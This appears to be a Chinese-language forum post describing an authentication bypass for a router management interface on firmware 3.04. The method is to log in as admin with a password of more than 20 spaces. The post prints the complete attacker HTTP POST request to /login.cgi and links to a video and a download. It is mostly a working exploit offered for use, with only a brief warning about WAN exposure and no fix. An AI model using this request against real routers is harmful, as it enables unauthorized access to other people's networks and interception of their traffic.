我只需要连接上路由器,然后查看路由器的网关地址,在浏览器打开网关地址,输入用户名admin,密码输入超过20个空格 即可成功绕过认证,进入路由管理后台.
PS:路由器固件是3.04.需要路由器为默认设置,没有修改用户名和设置特地IP才能访问管理界面.
如果你的路由器开放了广域网访问,那将很危险的.任何人都可以进入你得路由器.嗅探,窃听你得网络流量.
整个请求看起来应该类似这样的:
您为管理员组,请查看下方隐藏内容!
—————–ATTACKER REQUEST———————————–
POST /login.cgi HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/login.htm
Cookie: SessionID=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
username=Admin&password=+++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send
——————–END here————————
下面附上视频链接:
您为管理员组,请查看下方隐藏内容!
1.https://www.youtube.com/watch?v=waIJKWCpyNQring
2.https://pan.lanzou.com/1171760